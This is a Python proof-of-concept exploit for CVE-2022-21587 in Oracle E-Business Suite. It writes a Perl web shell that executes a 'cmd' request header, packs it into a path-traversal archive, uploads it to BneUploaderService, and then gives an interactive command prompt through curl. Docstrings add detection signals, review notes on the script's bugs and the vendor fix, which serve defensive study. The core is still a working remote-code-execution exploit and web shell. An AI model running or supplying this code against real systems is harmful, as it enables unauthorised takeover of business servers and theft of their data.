exploit.py
#!/usr/bin/python3
#POC by HMs
#CVE-2022-21587
import requests
import os
import sys
# Perl CGI source that Write_Shell() saves as txkFNDWRR.pl.  The script emits a
# text/plain header, reads the `cmd` HTTP request header via
# CGI::http('HTTP_CMD') and hands that value to system().
# Detection: a txkFNDWRR.pl on an application tier whose body is these few
# lines (CGI::http('HTTP_CMD') followed by system(...)) means the script has
# been replaced; requests that carry a `cmd` header to the CGI endpoint used
# in exploit() are the matching network-side signal.
shell = '''
use CGI;
print CGI::header( -type => 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;
'''
def Write_Shell():
    """Create the local artefacts that exploit() later uploads.

    Three files are produced in the current working directory:

    * ``txkFNDWRR.pl``  - the Perl source held in the module-level ``shell``.
    * ``txkFNDWRR.zip`` - built by the external ``slipit`` tool, which is asked
      to store the script under the prefix
      ``/FMW_Home/Oracle_EBS-app1/common/scripts/`` with ``--depth 5`` and
      ``--overwrite`` (presumably an entry name that climbs out of the
      extraction directory; confirm against the slipit documentation).
    * ``t.uue``         - the archive passed through ``uuencode``.

    Both external tools are started with ``os.system`` and their exit status
    is discarded, so a missing tool or a failed step is not reported here.

    Defender note: the server-side weakness this relies on is an archive
    extractor that honours entry names pointing outside its target directory.
    Rejecting such names at extraction time, plus the vendor fix for
    CVE-2022-21587, closes it.
    """
    script_body = "%s \n" % (shell)
    with open("txkFNDWRR.pl", "w") as script_file:
        script_file.write(script_body)

    pack_cmd = "slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl"
    encode_cmd = "uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue"
    for step in (pack_cmd, encode_cmd):
        os.system(step)
def exploit():
    """Run the proof of concept against the base URL in ``sys.argv[1]``.

    Flow, as written:

    1. ``Write_Shell()`` prepares ``t.uue`` in the working directory.
    2. ``t.uue`` is POSTed as multipart field ``text`` (content type
       ``multipart/mixed``) to
       ``/OA_HTML/BneUploaderService?bne:uueupload=true``.
    3. An HTTP 200 reply is treated as success and an interactive prompt
       starts; each line typed is sent by a local ``curl -ks`` as a ``cmd``
       request header to ``/OA_CGI/FNDWRR.exe``.  Any other status prints
       ``not vuln!``.

    Review notes:

    * ``host.endswith == '/'`` compares the bound method with a string and is
      therefore always False, so the leading-slash form of the upload URL is
      always used.
    * Status 200 is the only success test; the script never confirms that
      anything was written on the server, so "Shell has uploaded!" can be a
      false positive and ``not vuln!`` a false negative (for example behind
      a proxy or WAF).  Do not use the output as a patch-verification result.
    * ``sys.argv[1]`` is read without a length check, the ``t.uue`` handle is
      never closed, and ``requests.post`` is called without a timeout.
    * The prompt text is interpolated into an ``os.system`` command line, so
      whatever is typed is also parsed by the local shell of the machine
      running this script.  ``curl -k`` disables certificate verification.

    Detection / response: in web-tier access logs look for POSTs to
    ``BneUploaderService`` with ``bne:uueupload=true`` and for requests to
    ``/OA_CGI/FNDWRR.exe`` that carry a ``cmd`` header; on the application
    tier check ``txkFNDWRR.pl`` for unexpected content.  The client sets no
    User-Agent, so library defaults may appear, but that is trivially changed
    and should not be the only signal.
    """
    Write_Shell()
    host = sys.argv[1]

    # Always evaluates to '/', see the review note in the docstring.
    joiner = '' if host.endswith == '/' else '/'
    upload_url = host + joiner + 'OA_HTML/BneUploaderService?bne:uueupload=true'
    shell_url = host + '/OA_CGI/FNDWRR.exe'

    uue_name = 't.uue'
    multipart = {'text': (uue_name, open(uue_name, 'rb'), "multipart/mixed")}
    response = requests.post(upload_url, files=multipart)

    if response.status_code != 200:
        print('not vuln!')
        return

    print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')
    print('`press q || Q || quit to exit !!!` \n\n')
    print('`exploit: python3 http|https://example.com` \n\n')

    quit_words = ('q', 'quit', 'Q')
    while True:
        cmd = input("~shell[~]: ")
        if cmd in quit_words:
            break
        # Typed text reaches the local shell as part of this command line.
        os.system("curl -ks '%s' -H 'cmd: %s'" % (shell_url, cmd))
# Script entry point: exploit() runs only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    exploit()